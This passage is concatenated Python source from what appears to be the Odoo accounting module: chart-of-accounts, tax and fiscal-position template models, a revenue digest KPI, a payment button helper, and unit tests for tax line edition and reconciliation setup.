# regular accounts created and that liquidity transfer account
records = super(AccountChartTemplate, self)._load_records(data_list, update)
account_data_list = []
for data, record in pycompat.izip(data_list, records):
# Create the transfer account only for leaf chart template in the hierarchy.
if record.parent_id:
continue
if data.get('xml_id'):
account_xml_id = data['xml_id'] + '_liquidity_transfer'
if not self.env.ref(account_xml_id, raise_if_not_found=False):
account_vals = record._prepare_transfer_account_template()
account_data_list.append(dict(
xml_id=account_xml_id,
values=account_vals,
noupdate=data.get('noupdate'),
))
self.env['account.account.template']._load_records(account_data_list, update)
return records
def _get_account_vals(self, company, account_template, code_acc, tax_template_ref):
""" This method generates a dictionary of all the values for the account that will be created.
"""
self.ensure_one()
tax_ids = []
for tax in account_template.tax_ids:
tax_ids.append(tax_template_ref[tax.id])
val = {
'name': account_template.name,
'currency_id': account_template.currency_id and account_template.currency_id.id or False,
'code': code_acc,
'user_type_id': account_template.user_type_id and account_template.user_type_id.id or False,
'reconcile': account_template.reconcile,
'note': account_template.note,
'tax_ids': [(6, 0, tax_ids)],
'company_id': company.id,
'tag_ids': [(6, 0, [t.id for t in account_template.tag_ids])],
'group_id': account_template.group_id.id,
}
return val
@api.multi
def generate_account(self, tax_template_ref, acc_template_ref, code_digits, company):
""" This method generates accounts from account templates.
:param tax_template_ref: Taxes templates reference for write taxes_id in account_account.
:param acc_template_ref: dictionary containing the mapping between the account templates and generated accounts (will be populated)
:param code_digits: number of digits to use for account code.
:param company_id: company to generate accounts for.
:returns: return acc_template_ref for reference purpose.
:rtype: dict
"""
self.ensure_one()
account_tmpl_obj = self.env['account.account.template']
acc_template = account_tmpl_obj.search([('nocreate', '!=', True), ('chart_template_id', '=', self.id)], order='id')
template_vals = []
for account_template in acc_template:
code_main = account_template.code and len(account_template.code) or 0
code_acc = account_template.code or ''
if code_main > 0 and code_main <= code_digits:
code_acc = str(code_acc) + (str('0'*(code_digits-code_main)))
vals = self._get_account_vals(company, account_template, code_acc, tax_template_ref)
template_vals.append((account_template, vals))
accounts = self._create_records_with_xmlid('account.account', template_vals, company)
for template, account in pycompat.izip(acc_template, accounts):
acc_template_ref[template.id] = account.id
return acc_template_ref
def _prepare_reconcile_model_vals(self, company, account_reconcile_model, acc_template_ref, tax_template_ref):
""" This method generates a dictionary of all the values for the account.reconcile.model that will be created.
"""
self.ensure_one()
return {
'name': account_reconcile_model.name,
'sequence': account_reconcile_model.sequence,
'has_second_line': account_reconcile_model.has_second_line,
'company_id': company.id,
'account_id': acc_template_ref[account_reconcile_model.account_id.id],
'label': account_reconcile_model.label,
'amount_type': account_reconcile_model.amount_type,
'force_tax_included': account_reconcile_model.force_tax_included,
'amount': account_reconcile_model.amount,
'tax_id': account_reconcile_model.tax_id and tax_template_ref[account_reconcile_model.tax_id.id] or False,
'second_account_id': account_reconcile_model.second_account_id and acc_template_ref[account_reconcile_model.second_account_id.id] or False,
'second_label': account_reconcile_model.second_label,
'second_amount_type': account_reconcile_model.second_amount_type,
'force_second_tax_included': account_reconcile_model.force_second_tax_included,
'second_amount': account_reconcile_model.second_amount,
'second_tax_id': account_reconcile_model.second_tax_id and tax_template_ref[account_reconcile_model.second_tax_id.id] or False,
'rule_type': account_reconcile_model.rule_type,
'auto_reconcile': account_reconcile_model.auto_reconcile,
'match_journal_ids': [(6, None, account_reconcile_model.match_journal_ids.ids)],
'match_nature': account_reconcile_model.match_nature,
'match_amount': account_reconcile_model.match_amount,
'match_amount_min': account_reconcile_model.match_amount_min,
'match_amount_max': account_reconcile_model.match_amount_max,
'match_label': account_reconcile_model.match_label,
'match_label_param': account_reconcile_model.match_label_param,
'match_same_currency': account_reconcile_model.match_same_currency,
'match_total_amount': account_reconcile_model.match_total_amount,
'match_total_amount_param': account_reconcile_model.match_total_amount_param,
'match_partner': account_reconcile_model.match_partner,
'match_partner_ids': [(6, None, account_reconcile_model.match_partner_ids.ids)],
'match_partner_category_ids': [(6, None, account_reconcile_model.match_partner_category_ids.ids)],
}
@api.multi
def generate_account_reconcile_model(self, tax_template_ref, acc_template_ref, company):
""" This method creates account reconcile models
:param tax_template_ref: Taxes templates reference for write taxes_id in account_account.
:param acc_template_ref: dictionary with the mapping between the account templates and the real accounts.
:param company_id: company to create models for
:returns: return new_account_reconcile_model for reference purpose.
:rtype: dict
"""
self.ensure_one()
account_reconcile_models = self.env['account.reconcile.model.template'].search([
('chart_template_id', '=', self.id)
])
for account_reconcile_model in account_reconcile_models:
vals = self._prepare_reconcile_model_vals(company, account_reconcile_model, acc_template_ref, tax_template_ref)
self.create_record_with_xmlid(company, account_reconcile_model, 'account.reconcile.model', vals)
return True
@api.multi
def _get_fp_vals(self, company, position):
return {
'company_id': company.id,
'sequence': position.sequence,
'name': position.name,
'note': position.note,
'auto_apply': position.auto_apply,
'vat_required': position.vat_required,
'country_id': position.country_id.id,
'country_group_id': position.country_group_id.id,
'state_ids': position.state_ids and [(6,0, position.state_ids.ids)] or [],
'zip_from': position.zip_from,
'zip_to': position.zip_to,
}
@api.multi
def generate_fiscal_position(self, tax_template_ref, acc_template_ref, company):
""" This method generates Fiscal Position, Fiscal Position Accounts
and Fiscal Position Taxes from templates.
:param taxes_ids: Taxes templates reference for generating account.fiscal.position.tax.
:param acc_template_ref: Account templates reference for generating account.fiscal.position.account.
:param company_id: the company to generate fiscal position data for
:returns: True
"""
self.ensure_one()
positions = self.env['account.fiscal.position.template'].search([('chart_template_id', '=', self.id)])
# first create fiscal positions in batch
template_vals = []
for position in positions:
fp_vals = self._get_fp_vals(company, position)
template_vals.append((position, fp_vals))
fps = self._create_records_with_xmlid('account.fiscal.position', template_vals, company)
# then create fiscal position taxes and accounts
tax_template_vals = []
account_template_vals = []
for position, fp in pycompat.izip(positions, fps):
for tax in position.tax_ids:
tax_template_vals.append((tax, {
'tax_src_id': tax_template_ref[tax.tax_src_id.id],
'tax_dest_id': tax.tax_dest_id and tax_template_ref[tax.tax_dest_id.id] or False,
'position_id': fp.id,
}))
for acc in position.account_ids:
account_template_vals.append((acc, {
'account_src_id': acc_template_ref[acc.account_src_id.id],
'account_dest_id': acc_template_ref[acc.account_dest_id.id],
'position_id': fp.id,
}))
self._create_records_with_xmlid('account.fiscal.position.tax', tax_template_vals, company)
self._create_records_with_xmlid('account.fiscal.position.account', account_template_vals, company)
return True
class AccountTaxTemplate(models.Model):
_name = 'account.tax.template'
_description = 'Templates for Taxes'
_order = 'id'
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Tax Name', required=True)
type_tax_use = fields.Selection([('sale', 'Sales'), ('purchase', 'Purchases'), ('none', 'None'), ('adjustment', 'Adjustment')], string='Tax Scope', required=True, default="sale",
help="Determines where the tax is selectable. Note : 'None' means a tax can't be used by itself, however it can still be used in a group. 'adjustment' is used to perform tax adjustment.")
amount_type = fields.Selection(default='percent', string="Tax Computation", required=True,
selection=[('group', 'Group of Taxes'), ('fixed', 'Fixed'), ('percent', 'Percentage of Price'), ('division', 'Percentage of Price Tax Included')])
active = fields.Boolean(default=True, help="Set active to false to hide the tax without removing it.")
children_tax_ids = fields.Many2many('account.tax.template', 'account_tax_template_filiation_rel', 'parent_tax', 'child_tax', string='Children Taxes')
sequence = fields.Integer(required=True, default=1,
help="The sequence field is used to define order in which the tax lines are applied.")
amount = fields.Float(required=True, digits=(16, 4))
account_id = fields.Many2one('account.account.template', string='Tax Account', ondelete='restrict',
help="Account that will be set on invoice tax lines for invoices. Leave empty to use the expense account.", oldname='account_collected_id')
refund_account_id = fields.Many2one('account.account.template', string='Tax Account on Refunds', ondelete='restrict',
help="Account that will be set on invoice tax lines for refunds. Leave empty to use the expense account.", oldname='account_paid_id')
description = fields.Char(string='Display on Invoices')
price_include = fields.Boolean(string='Included in Price', default=False,
help="Check this if the price you use on the product and invoices includes this tax.")
include_base_amount = fields.Boolean(string='Affect Subsequent Taxes', default=False,
help="If set, taxes which are computed after this one will be computed based on the price tax included.")
analytic = fields.Boolean(string="Analytic Cost", help="If set, the amount computed by this tax will be assigned to the same analytic account as the invoice line (if any)")
tag_ids = fields.Many2many('account.account.tag', string='Account tag', help="Optional tags you may want to assign for custom reporting")
tax_group_id = fields.Many2one('account.tax.group', string="Tax Group")
tax_exigibility = fields.Selection(
[('on_invoice', 'Based on Invoice'),
('on_payment', 'Based on Payment'),
], string='Tax Due', default='on_invoice',
oldname='use_cash_basis',
help="Based on Invoice: the tax is due as soon as the invoice is validated.\n"
"Based on Payment: the tax is due as soon as the payment of the invoice is received.")
cash_basis_account_id = fields.Many2one(
'account.account.template',
string='Tax Received Account',
domain=[('deprecated', '=', False)],
oldname='cash_basis_account',
help='Account used as counterpart for the journal entry, for taxes eligible based on payments.')
cash_basis_base_account_id = fields.Many2one(
'account.account.template',
domain=[('deprecated', '=', False)],
string='Base Tax Received Account',
help='Account that will be set on lines created in cash basis journal entry and used to keep track of the tax base amount.')
_sql_constraints = [
('name_company_uniq', 'unique(name, type_tax_use, chart_template_id)', 'Tax names must be unique !'),
]
@api.multi
@api.depends('name', 'description')
def name_get(self):
res = []
for record in self:
name = record.description and record.description or record.name
res.append((record.id, name))
return res
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionary of all the values for the tax that will be created.
"""
# Compute children tax ids
children_ids = []
for child_tax in self.children_tax_ids:
if tax_template_to_tax.get(child_tax.id):
children_ids.append(tax_template_to_tax[child_tax.id])
self.ensure_one()
val = {
'name': self.name,
'type_tax_use': self.type_tax_use,
'amount_type': self.amount_type,
'active': self.active,
'company_id': company.id,
'sequence': self.sequence,
'amount': self.amount,
'description': self.description,
'price_include': self.price_include,
'include_base_amount': self.include_base_amount,
'analytic': self.analytic,
'tag_ids': [(6, 0, [t.id for t in self.tag_ids])],
'children_tax_ids': [(6, 0, children_ids)],
'tax_exigibility': self.tax_exigibility,
}
if self.tax_group_id:
val['tax_group_id'] = self.tax_group_id.id
return val
@api.multi
def _generate_tax(self, company):
""" This method generate taxes from templates.
:param company: the company for which the taxes should be created from templates in self
:returns: {
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
ChartTemplate = self.env['account.chart.template']
todo_dict = {}
tax_template_to_tax = {}
templates_todo = list(self)
while templates_todo:
templates = templates_todo
templates_todo = []
# create taxes in batch
template_vals = []
for template in templates:
if all(child.id in tax_template_to_tax for child in template.children_tax_ids):
vals = template._get_tax_vals(company, tax_template_to_tax)
template_vals.append((template, vals))
else:
# defer the creation of this tax to the next batch
templates_todo.append(template)
taxes = ChartTemplate._create_records_with_xmlid('account.tax', template_vals, company)
# fill in tax_template_to_tax and todo_dict
for tax, (template, vals) in pycompat.izip(taxes, template_vals):
tax_template_to_tax[template.id] = tax.id
# Since the accounts have not been created yet, we have to wait before filling these fields
todo_dict[tax.id] = {
'account_id': template.account_id.id,
'refund_account_id': template.refund_account_id.id,
'cash_basis_account_id': template.cash_basis_account_id.id,
'cash_basis_base_account_id': template.cash_basis_base_account_id.id,
}
if any(template.tax_exigibility == 'on_payment' for template in self):
# When a CoA is being installed automatically and if it is creating account tax(es) whose field `Use Cash Basis`(tax_exigibility) is set to True by default
# (example of such CoA's are l10n_fr and l10n_mx) then in the `Accounting Settings` the option `Cash Basis` should be checked by default.
company.tax_exigibility = True
return {
'tax_template_to_tax': tax_template_to_tax,
'account_dict': todo_dict
}
# Fiscal Position Templates
class AccountFiscalPositionTemplate(models.Model):
_name = 'account.fiscal.position.template'
_description = 'Template for Fiscal Position'
sequence = fields.Integer()
name = fields.Char(string='Fiscal Position Template', required=True)
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
account_ids = fields.One2many('account.fiscal.position.account.template', 'position_id', string='Account Mapping')
tax_ids = fields.One2many('account.fiscal.position.tax.template', 'position_id', string='Tax Mapping')
note = fields.Text(string='Notes')
auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
country_id = fields.Many2one('res.country', string='Country',
help="Apply only if delivery or invoicing country match.")
country_group_id = fields.Many2one('res.country.group', string='Country Group',
help="Apply only if delivery or invoicing country match the group.")
state_ids = fields.Many2many('res.country.state', string='Federal States')
zip_from = fields.Integer(string='Zip Range From', default=0)
zip_to = fields.Integer(string='Zip Range To', default=0)
class AccountFiscalPositionTaxTemplate(models.Model):
_name = 'account.fiscal.position.tax.template'
_description = 'Tax Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Position', required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax.template', string='Tax Source', required=True)
tax_dest_id = fields.Many2one('account.tax.template', string='Replacement Tax')
class AccountFiscalPositionAccountTemplate(models.Model):
_name = 'account.fiscal.position.account.template'
_description = 'Accounts Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Mapping', required=True, ondelete='cascade')
account_src_id = fields.Many2one('account.account.template', string='Account Source', required=True)
account_dest_id = fields.Many2one('account.account.template', string='Account Destination', required=True)
class AccountReconcileModelTemplate(models.Model):
_name = "account.reconcile.model.template"
_description = 'Reconcile Model Template'
# Base fields.
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Button Label', required=True)
sequence = fields.Integer(required=True, default=10)
rule_type = fields.Selection(selection=[
('writeoff_button', _('Manually create a write-off on clicked button.')),
('writeoff_suggestion', _('Suggest a write-off.')),
('invoice_matching', _('Match existing invoices/bills.'))
], string='Type', default='writeoff_button', required=True)
auto_reconcile = fields.Boolean(string='Auto-validate',
help='Validate the statement line automatically (reconciliation based on your rule).')
# ===== Conditions =====
match_journal_ids = fields.Many2many('account.journal', string='Journals',
domain="[('type', 'in', ('bank', 'cash'))]",
help='The reconciliation model will only be available from the selected journals.')
match_nature = fields.Selection(selection=[
('amount_received', 'Amount Received'),
('amount_paid', 'Amount Paid'),
('both', 'Amount Paid/Received')
], string='Amount Nature', required=True, default='both',
help='''The reconciliation model will only be applied to the selected transaction type:
* Amount Received: Only applied when receiving an amount.
* Amount Paid: Only applied when paying an amount.
* Amount Paid/Received: Applied in both cases.''')
match_amount = fields.Selection(selection=[
('lower', 'Is Lower Than'),
('greater', 'Is Greater Than'),
('between', 'Is Between'),
], string='Amount',
help='The reconciliation model will only be applied when the amount being lower than, greater than or between specified amount(s).')
match_amount_min = fields.Float(string='Amount Min Parameter')
match_amount_max = fields.Float(string='Amount Max Parameter')
match_label = fields.Selection(selection=[
('contains', 'Contains'),
('not_contains', 'Not Contains'),
('match_regex', 'Match Regex'),
], string='Label', help='''The reconciliation model will only be applied when the label:
* Contains: The proposition label must contains this string (case insensitive).
* Not Contains: Negation of "Contains".
* Match Regex: Define your own regular expression.''')
match_label_param = fields.Char(string='Label Parameter')
match_same_currency = fields.Boolean(string='Same Currency Matching', default=True,
help='Restrict to propositions having the same currency as the statement line.')
match_total_amount = fields.Boolean(string='Amount Matching', default=True,
help='The sum of total residual amount propositions matches the statement line amount.')
match_total_amount_param = fields.Float(string='Amount Matching %', default=100,
help='The sum of total residual amount propositions matches the statement line amount under this percentage.')
match_partner = fields.Boolean(string='Partner Is Set',
help='The reconciliation model will only be applied when a customer/vendor is set.')
match_partner_ids = fields.Many2many('res.partner', string='Restrict Partners to',
help='The reconciliation model will only be applied to the selected customers/vendors.')
match_partner_category_ids = fields.Many2many('res.partner.category', string='Restrict Partner Categories to',
help='The reconciliation model will only be applied to the selected customer/vendor categories.')
# First part fields.
account_id = fields.Many2one('account.account.template', string='Account', ondelete='cascade', domain=[('deprecated', '=', False)])
label = fields.Char(string='Journal Item Label')
amount_type = fields.Selection([
('fixed', 'Fixed'),
('percentage', 'Percentage of balance')
], required=True, default='percentage')
amount = fields.Float(string='Write-off Amount', digits=0, required=True, default=100.0, help="Fixed amount will count as a debit if it is negative, as a credit if it is positive.")
force_tax_included = fields.Boolean(string='Tax Included in Price',
help='Force the tax to be managed as a price included tax.')
tax_id = fields.Many2one('account.tax.template', string='Tax', ondelete='restrict', domain=[('type_tax_use', '=', 'purchase')])
# Second part fields.
has_second_line = fields.Boolean(string='Add a second line', default=False)
second_account_id = fields.Many2one('account.account.template', string='Second Account', ondelete='cascade', domain=[('deprecated', '=', False)])
second_label = fields.Char(string='Second Journal Item Label')
second_amount_type = fields.Selection([
('fixed', 'Fixed'),
('percentage', 'Percentage of amount')
], string="Second Amount type",required=True, default='percentage')
second_amount = fields.Float(string='Second Write-off Amount', digits=0, required=True, default=100.0, help="Fixed amount will count as a debit if it is negative, as a credit if it is positive.")
force_second_tax_included = fields.Boolean(string='Second Tax Included in Price',
help='Force the second tax to be managed as a price included tax.')
second_tax_id = fields.Many2one('account.tax.template', string='Second Tax', ondelete='restrict', domain=[('type_tax_use', '=', 'purchase')])
```
#### File: account/models/digest.py
```python
from odoo import fields, models, _
from odoo.exceptions import AccessError
class Digest(models.Model):
_inherit = 'digest.digest'
kpi_account_total_revenue = fields.Boolean('Revenue')
kpi_account_total_revenue_value = fields.Monetary(compute='_compute_kpi_account_total_revenue_value')
def _compute_kpi_account_total_revenue_value(self):
if not self.env.user.has_group('account.group_account_invoice'):
raise AccessError(_("Do not have access, skip this data for user's digest email"))
for record in self:
start, end, company = record._get_kpi_compute_parameters()
account_moves = self.env['account.move'].read_group([
('journal_id.type', '=', 'sale'),
('company_id', '=', company.id),
('date', '>=', start),
('date', '<', end)], ['journal_id', 'amount'], ['journal_id'])
record.kpi_account_total_revenue_value = sum([account_move['amount'] for account_move in account_moves])
def compute_kpis_actions(self, company, user):
res = super(Digest, self).compute_kpis_actions(company, user)
res['kpi_account_total_revenue'] = 'account.action_invoice_tree1&menu_id=%s' % self.env.ref('account.menu_finance').id
return res
```
#### File: account_payment/models/payment.py
```python
import logging
from odoo import fields, models, _
from odoo.tools import float_compare
_logger = logging.getLogger(__name__)
class PaymentTransaction(models.Model):
_inherit = 'payment.transaction'
def render_invoice_button(self, invoice, submit_txt=None, render_values=None):
values = {
'partner_id': invoice.partner_id.id,
}
if render_values:
values.update(render_values)
return self.acquirer_id.with_context(submit_class='btn btn-primary', submit_txt=submit_txt or _('Pay Now')).sudo().render(
self.reference,
invoice.residual_signed,
invoice.currency_id.id,
values=values,
)
```
#### File: account/tests/account_test_classes.py
```python
import logging
_logger = logging.getLogger(__name__)
from odoo.tests.common import HttpCase, tagged
class AccountingTestCase(HttpCase):
""" This class extends the base TransactionCase, in order to test the
accounting with localization setups. It is configured to run the tests after
the installation of all modules, and will SKIP TESTS if it cannot find an already
configured accounting (which means no localization module has been installed).
"""
def setUp(self):
super(AccountingTestCase, self).setUp()
domain = [('company_id', '=', self.env.ref('base.main_company').id)]
if not self.env['account.account'].search_count(domain):
_logger.warn('Test skipped because there is no chart of account defined ...')
self.skipTest("No Chart of account found")
def ensure_account_property(self, property_name):
'''Ensure the ir.property targeting an account.account passed as parameter exists.
In case it's not: create it with a random account. This is useful when testing with
partially defined localization (missing stock properties for example)
:param property_name: The name of the property.
'''
company_id = self.env.user.company_id
field_id = self.env['ir.model.fields'].search(
[('model', '=', 'product.template'), ('name', '=', property_name)], limit=1)
property_id = self.env['ir.property'].search([
('company_id', '=', company_id.id),
('name', '=', property_name),
('res_id', '=', None),
('fields_id', '=', field_id.id)], limit=1)
account_id = self.env['account.account'].search([('company_id', '=', company_id.id)], limit=1)
value_reference = 'account.account,%d' % account_id.id
if property_id and not property_id.value_reference:
property_id.value_reference = value_reference
else:
self.env['ir.property'].create({
'name': property_name,
'company_id': company_id.id,
'fields_id': field_id.id,
'value_reference': value_reference,
})
```
#### File: account/tests/test_account_move_taxes_edition.py
```python
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.tests import tagged
from odoo.tests.common import Form
@tagged('post_install', '-at_install')
class TestAccountMoveTaxesEdition(AccountingTestCase):
def setUp(self):
super(AccountingTestCase, self).setUp()
self.percent_tax = self.env['account.tax'].create({
'name': 'tax_line',
'amount_type': 'percent',
'amount': 10,
})
self.account = self.env['account.account'].search([('deprecated', '=', False)], limit=1)
self.journal = self.env['account.journal'].search([], limit=1)
def test_onchange_taxes_1(self):
'''
Test an account.move.line is created automatically when adding a tax.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Create manually a credit line to balance the two previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 1000 | | tax |
tax_line | 100 | | | tax_line
debit_line_1 | | 1100 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 1100
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 1100.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 100.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 1000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
def test_onchange_taxes_2(self):
'''
Test the amount of tax account.move.line is adapted when editing the account.move.line amount.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Set the debit amount to 2000 in the first created line.
- Assume the line containing the tax amount has been updated automatically.
- Create manually a credit line to balance the two previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 2000 | | tax |
tax_line | 200 | | | tax_line
debit_line_1 | | 2200 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
debit_line.debit = 2000
self.assertTrue(debit_line.recompute_tax_line)
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 2200
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 2200.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 200.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 2000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
def test_onchange_taxes_3(self):
'''
Test the amount of tax account.move.line is still editable manually.
Test the amount of tax account.move.line is cumulative for the same tax.
This test uses the following scenario:
- Create manually a debit line of 1000 having a tax.
- Assume a line containing the tax amount is created automatically.
- Edit the tax line amount of the auto-generated line by adding 5.
- Create manually a credit line to balance the two previous lines.
- Save the move.
- Edit the move.
- Create manually a debit line of 2000 having the same tax.
- Assume the line containing the tax amount has been updated (no new line created).
- Create manually a credit line to balance the four previous lines.
- Save the move.
tax = 10%
Name | Debit | Credit | Tax_ids | Tax_line_id's name
----------------|-----------|-----------|---------------|-------------------
debit_line_1 | 1000 | | tax |
tax_line | 300 | | | tax_line
credit_line_1 | | 1105 | |
debit_line_2 | 2000 | | tax |
credit_line_2 | | 2195 | |
'''
move_form = Form(self.env['account.move'], view='account.view_move_form')
move_form.ref = 'azerty'
move_form.journal_id = self.journal
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line:
debit_line.name = 'debit_line_1'
debit_line.account_id = self.account
debit_line.debit = 1000
debit_line.tax_ids.clear()
debit_line.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line.recompute_tax_line)
# Edit the tax account.move.line
with move_form.line_ids.edit(index=1) as tax_line:
tax_line.debit = 105 # Was 100
# Create a third account.move.line with credit amount.
with move_form.line_ids.new() as credit_line:
credit_line.name = 'credit_line_1'
credit_line.account_id = self.account
credit_line.credit = 1105
move = move_form.save()
move_form = Form(move, view='account.view_move_form')
# Create a new account.move.line with debit amount.
with move_form.line_ids.new() as debit_line2:
debit_line2.name = 'debit_line_2'
debit_line2.account_id = self.account
debit_line2.debit = 2000
debit_line2.tax_ids.clear()
debit_line2.tax_ids.add(self.percent_tax)
self.assertTrue(debit_line2.recompute_tax_line)
with move_form.line_ids.new() as credit_line2:
credit_line2.name = 'credit_line_2'
credit_line2.account_id = self.account
credit_line2.credit = 2195
move = move_form.save()
self.assertRecordValues(move.line_ids, [
{'name': 'credit_line_2', 'debit': 0.0, 'credit': 2195.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'debit_line_2', 'debit': 2000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
{'name': 'credit_line_1', 'debit': 0.0, 'credit': 1105.0, 'tax_ids': [], 'tax_line_id': False},
{'name': 'tax_line', 'debit': 300.0, 'credit': 0.0, 'tax_ids': [], 'tax_line_id': self.percent_tax.id},
{'name': 'debit_line_1', 'debit': 1000.0, 'credit': 0.0, 'tax_ids': [self.percent_tax.id], 'tax_line_id': False},
])
```
#### File: account/tests/test_reconciliation.py
```python
from odoo import api, fields
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo.tests import tagged
import time
import unittest
# TODO in master
# The name of this class should be TestReconciliationHelpers
class TestReconciliation(AccountingTestCase):
"""Tests for reconciliation (account.tax)
Test used to check that when doing a sale or purchase invoice in a different currency,
the result will be balanced.
"""
def setUp(self):
super(TestReconciliation, self).setUp()
self.account_invoice_model = self.env['account.invoice']
self.account_invoice_line_model = self.env['account.invoice.line']
self.acc_bank_stmt_model = self.env['account.bank.statement']
self.acc_bank_stmt_line_model = self.env['account.bank.statement.line']
self.res_currency_model = self.registry('res.currency')
self.res_currency_rate_model = self.registry('res.currency.rate')
partner_agrolait = self.env.ref("base.res_partner_2")
self.partner_agrolait_id = partner_agrolait.id
self.currency_swiss_id = self.env.ref("base.CHF").id
self.currency_usd_id = self.env.ref("base.USD").id
self.currency_euro_id = self.env.ref("base.EUR").id
company = self.env.ref('base.main_company')
self.cr.execute("UPDATE res_company SET currency_id = %s WHERE id = %s", [self.currency_euro_id, company.id])
self.account_rcv = partner_agrolait.property_account_receivable_id or self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_receivable').id)], limit=1)
self.account_rsa = partner_agrolait.property_account_payable_id or self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_payable').id)], limit=1)
self.product = self.env.ref("product.product_product_4")
self.bank_journal_euro = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'BNK67'})
self.account_euro = self.bank_journal_euro.default_debit_account_id
self.bank_journal_usd = self.env['account.journal'].create({'name': 'Bank US', 'type': 'bank', 'code': 'BNK68', 'currency_id': self.currency_usd_id})
self.account_usd = self.bank_journal_usd.default_debit_account_id
self.fx_journal = self.env['res.users'].browse(self.env.uid).company_id.currency_exchange_journal_id
self.diff_income_account = self.env['res.users'].browse(self.env.uid).company_id.income_currency_exchange_account_id
self.diff_expense_account = self.env['res.users'].browse(self.env.uid).company_id.expense_currency_exchange_account_id
self.inbound_payment_method = self.env['account.payment.method'].create({
'name': 'inbound',
'code': 'IN',
'payment_type': 'inbound',
})
self.expense_account = self.env['account.account'].create({
'name': 'EXP',
'code': 'EXP',
'user_type_id': self.env.ref('account.data_account_type_expenses').id,
'company_id': company.id,
})
# cash basis intermediary account
self.tax_waiting_account = self.env['account.account'].create({
'name': 'TAX_WAIT',
'code': 'TWAIT',
'user_type_id': self.env.ref('account.data_account_type_current_liabilities').id,
'reconcile': True,
'company_id': company.id,
})
# cash basis final account
self.tax_final_account = self.env['account.account'].create({
'name': 'TAX_TO_DEDUCT',
'code': 'TDEDUCT',
'user_type_id': self.env.ref('account.data_account_type_current_assets').id,
'company_id': company.id,
})
self.tax_base_amount_account = self.env['account.account'].create({
'name': 'TAX_BASE',
'code': 'TBASE',
'user_type_id': self.env.ref('account.data_account_type_current_assets').id,
'company_id': company.id,
})
# Journals
self.purchase_journal = self.env['account.journal'].create({
'name': 'purchase',
'code': 'PURCH',
'type': 'purchase',
})
self.cash_basis_journal = self.env['account.journal'].create({
'name': 'CABA',
'code': 'CABA',
'type': 'general',
})
self.general_journal = self.env['account.journal'].create({
'name': 'general',
'code': 'GENE',
'type': 'general',
})
# Tax Cash Basis
self.tax_cash_basis = self.env['account.tax'].create({
'name': 'cash basis 20%',
'type_tax_use': 'purchase',
'company_id': company.id,
'amount': 20,
'account_id': self.tax_waiting_account.id,
'tax_exigibility': 'on_payment',
'cash_basis_account_id': self.tax_final_account.id,
'cash_basis_base_account_id': self.tax_base_amount_account.id,
})
def create_invoice(self, type='out_invoice', invoice_amount=50, currency_id=None):
#we create an invoice in given currency
invoice = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': currency_id,
'name': type == 'out_invoice' and 'invoice to client' or 'invoice to vendor',
'account_id': self.account_rcv.id,
'type': type,
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
